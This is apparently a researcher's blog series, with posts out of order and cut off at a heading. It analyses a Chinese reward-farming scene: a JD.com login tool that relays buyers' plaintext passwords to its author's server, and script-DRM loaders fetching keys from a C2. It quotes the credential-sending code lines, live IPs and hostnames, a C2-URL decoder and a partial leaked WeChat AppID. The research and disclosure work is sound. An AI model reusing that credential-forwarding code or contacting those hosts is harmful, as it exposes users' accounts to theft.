• smallfawn is one of the more advanced actors in this whole scene: 152 repos, a 3,176-star script collection, and decode_action, the JS deobfuscator most of the ecosystem relies on. This post is about the product they sell that steals teh credentials from the people who buy it.
• They sell two “JD account and password login” tools to other reward farmers. One of them, JDLogin-Client, cannot log a victim into JD without first calling smallfawn’s own server, and it relays the harvested credentials straight back to them. They farm the farmers.
• The password harvesting server is at 8.141.174.247:3000. Every enrolled account’s JD username and plaintext password are sent there in a GET query string by the auto-renewal cron, three times a day (cron.js:54).
• Precise scope, because it matters: the interactive login path forwards the username only (express.js:41). The plaintext password reaches smallfawn through the cron job flow and through the default chat plugin, not on every login.
• The second tool, dingdingdang, does not phone home to smallfawn. Its problem is local: a plaintext credential store and a /get?k= endpoint that dumps every account and password to anyone holding one shared key, documented in the README as a feature.
• Collateral damage: a third party’s live secret is sitting in the tree. GAC Motor’s (广汽) WeChat AppSecret (f7b821...) was committed in 2024 and never removed, enough to mint WeChat OAuth tokens against GAC Motor’s own users.
• In fairness on timing: this tooling is dormant. JDLogin-Client, dingdingdang, and WoolWeb haven’t been touched since late 2024. smallfawn is still active in the scene, but development on these JD-login tools stopped then, and I did not probe the backend to confirm it still collects today.
• If you ran a 京东账密登录 / 路灯 / 鹿登 login bot, treat your JD password as compromised and rotate it now.

Terms in this post

If you landed here mid-series, a quick orientation. The hub has the full glossary.

• JD / 京东 is JD.com, one of China’s largest e commerce platforms. Think Amazon of China. This is what was targeted.
• CK / cookie is a captured app session credential. The unit reward-farmers trade and resell. How exactly they get these I think is another story.
• h5st is JD’s client side anti fraud request signature. You cannot complete a JD login without a valid one, and that is the lever this whole product turns on.
• AppID / AppSecret are a WeChat mini-program’s server credentials. The leaked GAC Motor pair is one of these.
• cron is a scheduled task runner. Here it is the thing that fires the password leak three times a day. The wool crew uses Qinglong as a web ui for this sort of thing.
• vm2 is a Node sandbox library. The version bundled in smallfawn’s tooling carries CVE-2023-29017, a known sandbox escape.

Background: the most capable person in the room

Most of the actors in this scene are copying each other. Same apps, same scripts, the odd file lifted word for word from the next account over. Same targets. smallfawn is the exception. Of their 152 repos, 130 are forks, but the 22 original ones are the load-bearing parts of the whole ecosystem: a 133-script farming collection (QLScriptPublic, 3,176 stars, every script CI-verified), a complete Go WeChat protocol server, and decode_action, the JavaScript deobfuscator with over 1,300 forks that half the scene uses to un hide each other’s scripts.

The person who wrote the tool everybody uses to make hidden code readable also runs a covert credential harvesting campaign. They are, by some distance, the most technically capable actor I found on the public GitHub accounts. That is exactly what makes the next part worth writing down.

They are not shy about the infra, either. Three of their chatbot plugins poll a printer over SNMP, watch a UPS over NUT (Network UPS Tools), and update Cloudflare DNS with IP changes. This is a person running physical, co-located infrastructure, not a kid with a free-tier VM.

One thing up front, so it does not get muddled with the last post: smallfawn has nothing to do with the wyourname wool DRM. Their scripts ship as plaintext, no loader, no C2-held key, no encryption to crack. Different operator, different model. They just happen to be in the same scene.

Two products, two trust models

smallfawn sells JD logins under “京东账密登录协议版本”, and the shop and demo hostnames are baked into the source: smshop.back1.idcfengye.com and smjd.back1.idcfengye.com. Neither is smallfawn’s own server: both are subdomains on idcfengye, a third-party reverse-tunnel (内网穿透) service in the Sunny-Ngrok family (run by 深圳猿类科技有限公司, filing 粤ICP备14050499号) — basically a Chinese ngrok-style service, one of several. smallfawn is just a tenant, so the hostnames only point at their box while their tunnel client is connected, which it wasn’t when I looked: either their tunnel was down, or this is dead infra.

The rest of this post is mostly about the first one. The second one is a real exposure, but it is just a shoddy code cleanlyness and defaults problem. The first one is a design.

Pillar A: JDLogin-Client routes credentials to smallfawn

You cannot log in without smallfawn’s server

server/config.json:3 ships with the real default already filled in:

{ "key": "卡密", "server": "http://8.141.174.247:3000", "cron": "0 25 20,23,2 * * *" }

The actual POST to JD.com (server/login.js:16-49) needs a pile of anti-fraud session parameters: guid, lsid, lstoken, verifytoken, the h5st signature, and the risk_jd bundle of eid, fp, token, jstub. None of that is generated on the buyer’s box. It is fetched from 8.141.174.247:3000 over /get (express.js:52, cron.js:59), and the license key (卡密) authenticates the buyer to that server (express.js:95-103). So the main anti fraud breaking software, is hidden behind smallfawn’s servers.

That is the lock. Without smallfawn’s server vending the h5st and risk tokens, the login cannot clear JD’s risk control, so it cannot complete at all. Every operator who buys this tool is wired into smallfawn’s infrastructure just to function. But note what actually has to cross their server: the username. The /get that vends the tokens is username-only (cron.js:59; the interactive /api/set is too, express.js:41). The password is never required to mint the anti-fraud tokens — the tool works fine with username-only vending — so its appearance in the cron /set (next section) isn’t a technical necessity. It’s harvesting.

The cron path leaks plaintext passwords, three times a day

server/cron.js:53-54 renews expired JD_COOKIEs on a schedule, and it does it like this:

async function getJDCookies(username, password, remark='无备注') {
    let { data: result } = await axios.get(config.server + '/set?key=' + config.key
        + '&username=' + username + '&password=' + password)   // -> 8.141.174.247:3000

The username and the plaintext password are read out of the local user.json (stored at login by login.js:54-60) and sent in the query string to 8.141.174.247:3000. The cron is 0 25 20,23,2 * * *, Asia/Shanghai, so this fires at 20:25, 23:25, and 02:25 every day, for every account the operator has enrolled. Not the cookie. The phone number and the password, in cleartext, in a URL. I think the timing on these things must have something to do with how long the tokens are valid for after minting them.

The default chat plugin sends end-user creds to smallfawn’s demo host

There is a third path, and it is the one that reaches all the way down to the end user. The shipped chat plugin, ludeng.js (路灯, “street lamp,” the bot trigger users type), defaults its API host to smallfawn’s demo box:

let YourSMJDAPIUrl = 'http://smjd.back1.idcfengye.com'   // smallfawn's host, the default
...
await axios.get(YourSMJDAPIUrl + '/api/get?username=' + ... + '&password=' + encodeURIComponent(password) + ...)

Unless the operator edits that line, every user who types their JD phone and password into the bot sends both, in the clear, straight to smjd.back1.idcfengye.com. I am guessing most operators will not edit it. It works out of the box, which is the point. Also it seems that a lot of the wool community just relies on others creating good scripts, and they may not even read them, if they did this sort of thing would not fly.

Pillar B: dingdingdang keeps it local, and leaves the door open

The second product is fairer to smallfawn as this does not appear to have malicious intent, but still bad for everyone who runs it.

dingdingdang logs in with a local headless Chromium browser (login.py), and its plugins default to 127.0.0.1:12345 (GoDongGoCar_update.js:4, sillygirl.js:12 these names are fun). There is no 8.141.174.247 in the loop. It does not phone home to smallfawn. I want to be clear about that, because when I first saw this I just assumed that this was in the same class as the jd.com credential theft, however that was lazy of me. I dont want you to make the same mistake as me. Trust your intuition, but always validate.

What it does instead is keep a plaintext credential store and then publish a key to it. docker/api.py:169-185 writes each account to a volume-mounted data.json:

account_data = { "account": ..., "password": workList[uid].password, "ptpin": ..., "remarks": ..., "wxpusherUid": "" }

password is plaintext. And docker/api.py:289-305 hands the whole file back to anyone with one shared key:

@app.route("/get")
async def get_data():
    if request.args.get("k") == config["key"]:
        return jsonify(load_from_file("data.json"))   # the entire plaintext store

One key, no rate limit, no per-user scoping. Guess or leak the key once and you have every enrolled account, password, and ptpin in the store. This is not a bug they overlooked. The README lists it as a feature: 获取账密 备注 ptpin信息 /get?k=密钥, “fetch account-password, remarks, and ptpin info.” The recommendation is a 16-character key “to protect your account and password information.” There is no server-side enforcement of that, of course.

The git history that proves the server is real

A skeptical reader should be asking whether 8.141.174.247:3000 is a real backend or a placeholder somebody forgot to fill in. The git history settles it, and it does so because smallfawn made the same mistake everyone in this scene makes.

The first commit of JDLogin-Client, 9df41a2 on 10 November 2024, shipped config.json with a real license key in place:

{ "key": "HASL1", "server": "http://8.141.174.247:3000" }

The next day, commit e98c5aa, both were scrubbed to placeholders (KEY, APIURL). The day after that, commit fd5c0df, the server address was quietly added back while the key stayed as 卡密 (Access Code). You do not scrub, then re-add a placeholder. HASL1 was a working shared secret that sat in public for about a day, and the IP it sat next to is the real backend.

That scrub is also a preview of the next post in this series. Everyone here scrubs git history, smallfawn, qltrojan, leafTheFish, all of them, usually with the same orphan branch trick (I will write up how this works at some point). The scrub is meant to remove the evidence. More often it marks exactly where the evidence was. Also things can be missed when doing this.

Collateral: a third party’s WeChat keys

The blast radius is not limited to JD. While reading the WoolWeb panel I found server/data_gac.json, committed once on 9 October 2024 (783550a) and never touched again. It holds a live credential set for a company that has nothing to do with any of this: GAC Motor (广汽), the car manufacturer.

• WeChat AppID wx55d651b24ca783fa
• WeChat AppSecret f7b821... (redacted here)
• a full accessToken and sdkTicket, both now stale

The tokens expire. The AppSecret does not. As long as it stands, anyone who can read this file can mint fresh WeChat OAuth tokens against GAC Motor’s mini program and impersonate the users who authenticated through it. That is a clean third-party disclosure item, unrelated to the JD pipeline, sitting in a public repo since 2024.

The wider arsenal

This is not the whole operation, it is one corner of it. A quick look at the rest, because each one rounds out the picture of what this operator can do.

• docker-wx is a complete Go implementation of the WeChat iPad protocol, 145 API endpoints, bundled with the 855协议.zip protocol source and stamped 仅限集团内部使用,请勿对外, “internal use only, do not expose.” It is a full WeChat account-takeover server.
• rs-reverse is a 26 MB, 3,450-file framework for bypassing Ruishu (瑞数), the VMP (Virtual Machine Protection) based bot detection that guards China Telecom and a lot of banks. This is professional reverse engineering work.
• XianYuApis reverses the full Goofish (闲鱼) marketplace API and bolts a WebSocket auto-reply bot onto it, so farmed goods can be listed and haggled over at scale with no human in the loop.
• VirtualApp is the device ID rotation layer: run many instances of one app, each with a different fake device fingerprint, to beat the single-device limits farming runs into. Think of this as using a tonne of valid user agents.
• decode_action, the deobfuscator the whole scene depends on, ships vm2@^3.9.11 as a dependency, and that version carries CVE-2023-29017, a sandbox escape. The directional risk is real: run decode_action on a malicious obfuscated script and that escape is in play — the deobfuscator the whole scene trusts is itself an attack surface. I’m not asserting smallfawn did this on purpose; the exposure stands either way.

The basic flow: reverse the protections, sign the requests, rotate the devices, automate the chat, sell the goods. That is an integrated fraud platform, and the JD login tool is the part that also taxes its own users.

The limits of my engagement, and this report.

The honest limits, because they matter more here than usual.

All of this code has been dormant since 2024, smallfawn is still active in the scene, but work on these tools stopped at the end of 2024.

Everything above is read out of public source at file and line. I did not send anything to 8.141.174.247:3000, I did not probe it, and I did not watch a single packet leave a real install. Naming a sink is not the same as poking it, and I stayed on the safe side of that line. The claim “smallfawn receives the credentials” is an inference from explicit code paths, the GET to their server is right there in cron.js:54, but I am inferring the server stores what it is handed, not proving it from traffic.

And I do not know who smallfawn is. The handle, the repos, the QQ group, the shop, those are real and public. The person behind them is unconfirmed, and this post does not try to change that. I am reporting a mechanism and a sink, not a name.

Disclosure

This one has real victims and a credential sink, so it went to the vendors first: reported to JD.com and GAC Motor on 24 June 2026, ahead of publication.

• JD.com security. 8.141.174.247:3000 is a credential relay tied to automation against plogin.m.jd.com/cgi-bin/mm/domlogin. The abuse primitive worth their attention is the h5st and risk-token vending, that is the thing that lets a third party clear JD’s risk control on behalf of a paying operator base.
• GAC Motor (广汽). Rotate WeChat AppSecret f7b821.... It has been public in WoolWeb/server/data_gac.json since October 2024 and is enough to impersonate their WeChat users.
• End users. Anyone who used a 京东账密登录, 路灯, or 鹿登 login bot should treat their JD password as compromised and rotate it.

IOCs

The GAC AppSecret is redacted until it is confirmed rotated. Everything else is smallfawn’s own infrastructure.

• A friend’s grep.app link and a hunt for leaked password prefixes turned one 292-star GitHub repo (985Ming/qlk) into a map of a Chinese reward-farming (薅羊毛) underground: 16 actors, 26 repos, 60+ targeted platforms.
• Reward farming here means running scripts on a schedule, via Qinglong (a cron-job webui), to drain loyalty points, coupons, and lottery payouts from apps, then cashing out on Xianyu or Pinduoduo.
• It runs like a supply chain: operators write the scripts, one operator (wyourname) rents out script DRM to protect them, shared plumbing (NiuPanel, obfuscators, OCR, device-ID pools) hides the bots, and a WXPusher ping tells the operator when money lands.
• The targets are broad: music, video, novels, telecom, and banks, plus civic and government apps and state media.
• The ugly part: in at least one case the tooling robs its own users. smallfawn sells a JD.com login tool wired to exfiltrate the buyer’s logins, plaintext passwords included, to a server they control.
• Where it stops: the modern scripts are sealed behind wyourname’s C2, which is dark (404s, status: false). I mapped 49 of them and decrypted none. Everything I cracked is the older, weaker tier.
• All read-only. I didn’t farm an account or log into anything, and anything live went to the vendors first.

How it all started:

Recently a friend shared a link to grep.app, a super fast GitHub search tool. I started hunting for known password and API key prefixes. One of them landed me on this repo: https://github.com/985Ming/qlk.

This is a repo of ~99 obfuscated python and js scripts, with the description:

Original Chinese:

青龙脚本库 2025年新本；脚本q群1025838653

English translation:

Qinglong Script Library – New scripts for 2025; Script QQ Group: 1025838653

This really piqued my interest, what on earth have I just stumbled upon (rip StumbleUpon 2002 - 2018)

Well after cloning the whole repo I realised that I couldn’t read or understand any of it, so now I have to, there goes my weekend.

What on earth is Qinglong?

This was about all I had to go off to figure out what was going on. Turns out this is a program used by wool farmers to run scripts on a regular basis. Think of this like a webui for cron jobs: https://github.com/whyour/qinglong

This is a common tool for people who do “wool”, or reward farming in English. They run Qinglong as their orchestration server. Submit a script, set a cadence, and it fires. qlk was a pile of exactly those scripts.

This turns out to be a full on ecosystem of rewards farming -> monetization -> cashout chains.

The 黑灰产 or black/grey industry of 薅羊毛

Where there is money to be made, someone will find a way to exploit it. I went in expecting a few people swapping scripts. I came out the other side with 16 actors, 26 repos, and 60+ targeted platforms.

As part of this there is an entire structure that is built around this, and the more I pulled on the thread the less it looked like a few people swapping scripts and the more it looked like an actual supply chain. Roughly, it stacks up like this:

• The operators — the people writing and running the scripts. Two camps: the reward farmers (985Ming, xxwppp, KingJin, smallfawn and friends) going after Chinese loyalty and points programs, and a separate crowd cracking iOS in-app purchases (MCdasheng, Yu9191). Different targets, same playbook.
• A protection layer (protecting the scripts) — qlk’s own obfuscation came apart easily, and that turned out to be the easy tier. One operator, wyourname, runs the industrial version: DRM as a service, encrypted .so loaders plus a C2 server that hands out the decryption key per machine. The other authors rent it so their scripts can’t just be lifted straight off GitHub. That tier is the one that actually stopped me. At least this is what I think is happening.
• The plumbing — Qinglong to run everything, plus a from-scratch clone called NiuPanel, obfuscators to hide the scripts, a shared deobfuscator to unhide them, OCR services to solve CAPTCHAs, and shared device-ID pools so every bot looks like a real phone.
• The targets — those 60+ platforms. Music, video, novels, telecom, banks… and more uncomfortably, civic and government apps and even state media.
• Cashout — points become vouchers become cash, resold on Xianyu or Pinduoduo, or lottery wins paid straight out to Alipay.

The whole thing is really just one pipeline: the scripts -> Qinglong runs them on a schedule -> they hammer the target apps -> points and coupons -> resold or cashed out -> a WXPusher notification pings the operator to say the money landed. Distribution sits over the top of all of it: GitHub, Telegram, QQ groups, and a marketplace at script.345yun.cn.

And here’s the bit that made me really worried, and realised that this really is not just some skids: in at least one case the tooling steals from the people using it. One of the most capable operators, smallfawn, sells a JD.com login tool to other farmers that’s quietly wired to send the harvested logins, plaintext passwords included, three times a day back to a server they control. They are, quite literally, farming the farmers.

I should be straight up about where this all ends, because it’s the part that’s most of the work and least of the fun: the modern scripts are sealed behind that wyourname C2, and the key server is effectively dark, it 404s, and a status: false flag gates the handout. And even getting that far, the loader geolocates you and POSTs a fingerprint of your machine to a box in Shanghai first, so I’d be handing my own setup straight to them. So I mapped 49 of them and decrypted exactly… none. Everything I did manage to crack is the older, weaker tier.

Over the next few posts I’ll pull each layer apart, so stay tuned for:

1. The DRM, part 1: wyourname’s old Cython loader, and how I reversed it end to end. The key was baked into the binary, so it protected nothing.
2. The DRM, part 2: the current Rust tier, where the key lives on a C2 and never on your machine, and how far I got without ever breaking it.
3. Farming the farmers: smallfawn’s JD.com login tool, quietly wired to rob the people who buy it.
4. The civic angle: how government, civic, and state-media apps got dragged into all this.
5. The attack mechanics: the handful of tricks that show up again and again across 60+ platforms.
6. The cast: the 16 actors, and how I mapped the whole bloody thing from one random repo.

All of it was read-only, I didn’t farm a single account or log into anything, and anything live went to the vendors first.

• Recap: wyourname/wool is the script-DRM repo a big slice of the Chinese reward-farming (薅羊毛) scene rents to seal their fraud scripts. The old Cython tier baked its key into the binary, so I cracked it. That was the previous post.
• The current tier is Rust (loader_v2, common, component) doing AES-CBC. The key is never in the binary: common fetches it per machine from a C2 and loader_v2 decrypts with it.
• I did not crack one ev2 payload, and that is the design working as intended.
• Score: 49 ev2 scripts mapped, 0 decrypted. The crypto is ordinary, the wall is where the key lives.
• The C2 is 1.94.146.238:8099 (Huawei Cloud, Shanghai) with a doudoudou.top backup. It currently 404s and control.json carries status: false, but the binaries were still updated in June 2026, so someone is still running it.
• Everything I say about what the sealed scripts do is inference, not extraction. All read-only, nothing farmed, nothing logged into.

Recap: the loader I cracked

A quick recap if you skipped the first post. wool is a zero-star GitHub repo that does one job, script DRM, and a large part of the Chinese reward-farming scene rents it to seal their fraud scripts. The repo ships four loaders. The old one is a Cython module running a hand-ported JavaScript DES, and I reversed it end to end, because the key was baked into the binary. Recover that key once and every payload the loader ever sealed falls open.

This post is about the other three, the ones written in Rust. They are the tier the operator built after deciding the baked-in key was the mistake, which it was… The cipher is no harder. The key just stopped living on your machine.

Track B: The Great Rust Wall (ev2)

I found Track B by accident. With the DES loader working, I started feeding it every encrypted file in the repo thinking I had hit the jackpot, and most decrypted fine. Then a whole folder, encrypted_files_v2, threw json.JSONDecodeError on every single file. The DES loader was trying to parse them as something they weren’t and giving up the ghost. These were not DES payloads. They were a different format altogether, for a different loader. That is when it clicked: two generations of this thing, not one. Hence the different .so files!

The newer generation is Rust. loader_v2 (827 KB) and component (8.2 MB) are both Rust compiled to native code, and where the Cython loader handed me everything, these kept their secrets. So I’ll say it up front: I did not get through this tier. I can map it, fingerprint the format, and name most moving parts. But I never decrypted a single ev2 payload. That is by design, and the design is good, well its good against offline attacks.

How do I know it’s Rust if it’s stripped? Because Rust has a few tell tale signs. It bakes the source path of every panic site into the binary, including the full path of every crate it pulled from the build machine’s cargo registry, versions and all. The operator’s function names are gone, but the dependency tree is sitting in strings: pyo3 (a Python extension written in Rust), tokio (async), flate2 (gzip), and in loader_v2, zeroize next to a src/utils/crypto.rs doing block-cipher work. No more JavaScript DES :(. This is the real thing.

The split across the binaries is the clever part. loader_v2 exposes one Python method, _decrypt(eb), that takes an encrypted bundle and does the whole job inside Rust: custom Base64, AES-CBC, gzip, marshal, run. Unlike Track A’s get_key(), nothing hands you the key. It never leaves Rust memory, and zeroize wipes it after use. It’s also machine-bound: sysinfo reads /proc/cpuinfo and friends so a bundle is tied to the hardware it was provisioned for. And the key does not live in the binary at all. It comes from the operators C2 server.

That server is in control.json, in the root of the repo:

{"message":"已更新","status":false,
 "url1":"Hw0bBUhBTlxLTk1BREZYT19WT0NXRUtXTg==",
 "url2":"Hw0bBUhBTgwVHlcLGgcKDhgBGAxBAR0eTg==","version":1.07}

The URLs are base64 over a fixed key XOR, and the key is wyourname, the author’s own username:

>>> import base64
>>> def dexor(s, key=b"wyourname"):
...     raw = base64.b64decode(s)
...     return bytes(c ^ key[i % len(key)] for i, c in enumerate(raw))
...
>>> dexor("Hw0bBUhBTlxLTk1BREZYT19WT0NXRUtXTg==")
b'http://1.94.146.238:8099/'
>>> dexor("Hw0bBUhBTgwVHlcLGgcKDhgBGAxBAR0eTg==")
b'http://api.doudoudou.top/'

The primary on a Huawei Cloud box in Shanghai, and a backup on doudoudou.top. The third Rust binary, common (3.2 MB), is the client that talks to it: reqwest and rustls in its crate list, it fingerprints the machine, POSTs to that C2 over HTTP, and gets back the per script key, which it feeds to loader_v2 to do the decrypt. So the work is split three ways: common fetches the key, loader_v2 uses it, and the operator’s server is the only place the key ever sits in the clear.

That is the whole design, and it is the part Track A got wrong. Track A baked the key into the loader the key was in the same draw as the lock, so recovering it once broke everything. Track B leaves the locked payloads public, on GitHub’s CDN where there is nothing to take down since the scripts are not readable at all, and keeps the keys on a server it controls. You can clone every ev2 file in the repo. Without the C2, they are noise. Though I do wonder I could brute force them somehow… Spoiler: You can’t. With standard AES-CBC and zero key leaks in the binary, the keyspace is a computational brick wall.

component.so: the heavy runtime

loader_v2 is the light tier. component.so is the other one, and it is a different animal: 8.2 MB, built on a statically-linked OpenSSL instead of Rust’s rustls, with its symbol table left in. Among its strings, XOR’d with wyourname again, is a client-key path:

/etc/ssl/private/UAP_reload_ca.key

I have to be careful here, because this is where I start reading tea leaves. I never watched component talk to anything, the C2 is dark, so the mutual-TLS story is inferred from that one string, not seen on the wire. But it’s a loud string. A binary that statically links the whole OpenSSL stack and reaches for a CA private key at a fixed path is almost certainly doing client-certificate auth: a server that won’t open the door unless you present a cert it issued.

Which raises a question I can’t fully answer: how does that key get onto the box? component reads the path, it doesn’t write it, and it ships no certificate of its own. So something else has to drop the key at install time, which means these instances aren’t generic, they’re provisioned. Whatever sets a subscriber up hands them a client cert tied to the operator’s CA. I never caught that step happening, so the mechanism is a gap, but the shape is clear enough: this tier expects a tailored, pre-seeded box, not a fresh pip install. I guess maybe this comes from Qinglong?

It doesn’t stop there. component enumerates every single network interface and reads the MAC addresses (getifaddrs), binding the license to physical hardware, not just an OS install. And it can update and delete itself:

New version available! Please update.
No wyourname.so file found in the current path.

When the C2 signals a new version, the binary deletes itself and pulls the replacement, so the operator can push fresh code to every install silently by bumping a counter. The whole thing is hardened like commercial DRM, because that is basically exactly what it is.

One fun detail is where the operator talking back. Among those same XOR’d strings, decoded with the same wyourname key:

Whatareyoulookingat

Which is a fair question to leave for whoever is doing exactly what I was doing.

What the sealed files give up anyway

I couldn’t read the ev2 payloads, but I didn’t leave them alone, and an encrypted file is rarely as opaque as it looks. Strip off the outer func_mod::xor layer (a reversible byte-to-printable transform, with no secret in it) and the structure is right there. Every file opens with the same 12-character magic, |(LTm_R7mUd@, and the first 86 bytes are byte-for-byte identical across all 192 files I pulled: that magic plus a first instruction that is always the same gzip header. The plaintext is gzipped bytecode, and the format barely bothers to hide that much.

The binary claimed AES. The format confirmed it, and told me something odder besides: this isn’t one big encrypted blob. It’s a stream of small structured records, one per bytecode instruction, each sitting between >TZK> delimiters with its encrypted bytes in the middle. Run an autocorrelation over a file and there’s a clean spike at a 64-character period: 16 bytes, one AES-CBC block. So each instruction is encrypted on its own, a block at a time. The operator didn’t encrypt a file, they built a custom per-instruction container and AES’d the contents one record at a time.

+----------------+-----------------------+----------------+-----------------+
| >TZK>          | AES-CBC ciphertext    | >5@K>zNZuqYvC~ | opcode argument |
| frame delim    | 16 bytes (one block)  | inner delim    | 2 chars, clear  |
+----------------+-----------------------+----------------+-----------------+

One record, repeated once per instruction. The file opens with the 12-char magic |(LTm_R7mUd@ once. In the file each ciphertext byte is written as four ASCII characters and the delimiters are literal, so that 16-byte block is 64 characters on disk; longer instructions chain more blocks.

And the records leak. Each encrypted instruction is trailed by a two-character argument that isn’t encrypted at all, and I’m sure of that from how it behaves across builds. The repo ships every script compiled for four Python versions, and bytecode changes between versions, so the encrypted bytes shift from the 3.9 file to the 3.11 one. The two char suffixes don’t. A value that stays identical across all four builds, at a fixed spot right after the delimiter, can’t be inside the ciphertext: it’s the opcode’s argument, outside the encryption in the clear.

That is the ceiling. With the magic, the block structure, the plaintext arguments, and file sizes lined up against scripts I’d already cracked on the xxwppp side (the sister cluster of repos that runs on the same Track A loader, so its payloads come out readable), I can sketch the skeleton of any ev2 file in the repo. What I can’t do is read a line of it. The key is the one thing the format doesn’t leak.

The contrast: yphd, reversed before lunch

To see why the wool C2 model is actually strong, it helps to look at someone in the same scene who did it the other way. yphd and khr2606 are two binaries from a neighbouring repo, and they look intimidating: 15 MB and 10 MB ELF files, every string encrypted, no readable Python anywhere. But they are Nuitka --onefile builds. Nuitka is a Python to C compiler, and --onefile bundles the whole interpreter plus a zstd-compressed copy of the program into a single executable. The “encryption” is just Nuitka packing its constant tables. It isn’t a security feature and it isn’t gated on anything. Everything needed to run is inside the file.

Which means it all comes back out. The Nuitka bootstrap unpacks itself to a temp directory at startup; catch it there and you have the original Python. khr2606 turned out to be a solver for China Unicom’s “Customer Day” Bubble Battle, a hexagonal bubble shooter run as a loyalty promotion - pretty much a clone of Puzzle Bobble with some rewards. The script runs a BFS over the grid to find floating bubbles, picks the shot that clears the most, and, my favourite touch, deliberately stops once it has eliminated more than 200 so it doesn’t look like a bot. The whole thing was readable in about two hours.

That is the point. yphd packs its code; wool gates its code. Packing always loses under scruitany, because the unpacked version has to exist somewhere at runtime for the program to do anything. A C2 held key never has to exist on the victim’s machine at all. It is the difference between a locked box you were also handed the key to, and a locked box whose key stays on someone else’s server.

Where it stops

So here is the honest dead end. There are 49 ev2 scripts in the repo, four Python builds each, 196 files in all, and I have 192 of them, every build of all but one script. I can describe the format down to the byte, I know the cipher is AES-CBC, I know the key is universal and the same for every user. What I do not have is that key, because it only comes from the C2, and the C2 will not talk to me. Every path I tried on 1.94.146.238:8099 returns 404, and control.json carries status: false. Whether the server is off, moved, or simply refusing anything without a valid machine fingerprint and the right client certificate, I can’t tell from the outside. The repo itself is alive, its compiled binaries were updated as recently as June 2026. Someone is still maintaining it. The doors are just locked.

Which means everything I can say about what those 49 scripts actually do is inference, and I want to be clear about that. The names are romanized guesses from the encoded filenames. The categories, KuWo Music, Ximalaya, Bilibili, state-media reading apps, a pile of regional civic platforms, come from file size, instruction counts, the plaintext argument bytes, and matching sealed files against their cleartext twins on the xxwppp side. None of it was extracted. I never saw the source of one ev2 script. If this series tells you what nebula-pr does, it is a hypothesis with evidence behind it, not a decryption.

That is the wall, and it’s a good one. The reason I can tell the Track A story all the way through and the Track B story only halfway comes down to a single design decision: where the key lives.

Resources

• PyO3, the Rust-to-Python bridge behind loader_v2, common, and component.
• AES in CBC mode, the cipher behind the ev2 format, with the key held off the box on the C2.
• Python’s marshal and PyEval_EvalCode, the last two steps of the ev2 pipeline once the AES layer comes off.

• wyourname/wool is a zero-star GitHub repo that does one job: script DRM. A big slice of the Chinese reward-farming (薅羊毛) scene rents it to seal their fraud scripts so they can’t be lifted straight off GitHub.
• Why bother locking a checkin script? In this scene the script is the product. It gets sold, rented, and gated behind license keys, so the code itself is the thing a buyer is paying not to be able to copy.
• The old tier is a Cython module (loader_39_x86_64.so) running a hand-ported JavaScript DES. I reversed it end to end.
• The key is hardcoded (f30db728...), the same eight bytes in every build. Recover it once and every payload that loader ever sealed falls open, so it protects nothing.
• I’m publishing the method and the lesson, not a decrypt script. All read-only, nothing farmed, nothing logged into.
• The newer tier of DRM fixed the mistake that made this one crackable: it moved the key off the box and onto a C2. That is the next post.

Why I started pulling on these .so files

At the end of the last post I had a repo I couldn’t read. Here’s the part I skipped over: qlk’s own obfuscation was never the hard problem.

Every script is the same trick, base85 or XOR or a subtract cipher, then zlib, then a marshalled code object handed straight to exec(). It runs in memory and never writes a .pyc, so it stops you reading the source but not running it, and anything you can run you can hook. After decoding these scripts I realised what I had stumbled upon, a treasure trove of scripts that are used to defraud news sites, ads, and local government websites, all to make a little bit of cash. We will go into this in more detail in another post.

Curious to see if this was just a single example of bad opsec, I started searching the endpoints they were targeting. Boy they were everywhere: a KuWo cash-withdrawal endpoint alone is in at least five other people’s repos. And it wasn’t just the targets that matched: two of qlk’s obfuscators are hand-rolled, not off-the-shelf, and the same fingerprints turned up in another author’s repo in the same cluster. Same private toolchain, different authors. qlk wasn’t a one-off, it was one corner of a whole scene.

So I started reading through these repos. Most were more of the same: same apps, same obfuscation, the odd file copied word for word from one account to the next. Typical for a scene like this that people would be stealing others scripts. But a few were built differently. They didn’t contain any logic at all. They imported a loader, pulled down a .so, and handed it an encrypted string to run. And one of them, a plaintext one, had left the download URL sitting right at the top of the file:

DEBIAN_URL = 'https://raw.githubusercontent.com/wyourname/wool/master/others'

That was the repo. wyourname/wool: zero stars, description 自用 (“personal use”), quietly hosting the loaders a large portion of the scene was using to protect their scripts.

Why lock a wool script?

Before any of the reverse engineering, it is worth settling what the lock is even for. A wool script automates a checkin, a lottery draw, a daily reading task. It is not state secrets. So who is it hiding from, and why would anyone pay to keep it sealed?

Because in this scene the script is the product. These things get sold and rented. There are panels that meter access, license keys (卡密) that gate a single run, resellers who never wrote a line of the code they sell or rent. The moment the source is readable, a buyer copies it once and stops paying, or undercuts the author by selling it on himself. Confidentiality is the whole business model.

The checkin loop was never the part worth protecting. Anyone can write one. The value is in the bypass underneath: the h5st signature JD’s app demands, the risk tokens, the shared pool of device IDs, the CAPTCHA solver, the Ruishu fingerprint defeat. That is months of work against a target that keeps moving, and it is exactly what a rival in the same scene wants to lift. Lock the file and the exploit stays yours.

A loader that fetches its key from a server buys one more thing: an off switch. Stop handing out the key, or flip a flag in a config, and every copy already deployed goes dark at once. The author keeps a hand on a product he has already sold.

There is a defensive (for the fraudsters) bonus too. An encrypted payload sitting on GitHub is just a bunch of bits. JD cannot read it to build a detection, a researcher cannot skim it for indicators, and there is nothing legible to file a takedown against. The fraud code hides in plain sight, on a CDN that will never take it down, since it doesnt even know its a fraud script.

And the whole scene runs on no trust. The operators do not even trust the customers they sell to, and I guess they shouldn’t. A later post is about one author who quietly routes his buyers’ harvested passwords back to his own server. DRM is that same instinct pointed at the paying customer: hand them the capability, never the code.

So that is the motive. The rest of this post is how well they actually pulled it off, starting with the version that got it wrong.

Wool repo overview

Now this wool repo is hella interesting, it’s the basis of a bunch of different script DRM techniques.

The repo has two branches, master and compatible, the latter untouched for three years. Everything interesting is on master.

The first two things that stood out to me. First, a folder called encrypted_files_v2, updated three weeks ago, full of .txt files that all open with the same 12-character magic (|(LTm_R7mUd@) and then gibberish. Second, a script/ directory containing common.py. A loader that subscribers actually run. That file is readable, and it tells you the shape of the whole system: you hand it a script name, it then figures out your Python version and arch, fetches the right .so binary from the repo’s others/ directory, loads it as a Python extension module, and calls main(). From that point common.py is out of the picture. Whatever happens next happens inside the binary.

I expected one loader. There are four of them in others/ and they don’t all work the same way: loader is an old Cython module, and loader_v2, common, and component are Rust. The one common.py pulls by default is common. It’s all one product, carried from Python into Rust and grown since, which is the tell that this system has a history.

This post is about the old one, the Cython loader, because it is the one that opens up and tells me all its secrets. The other three are written in Rust, and they are a harder story that gets its own post.

Track A: Cython DES loader

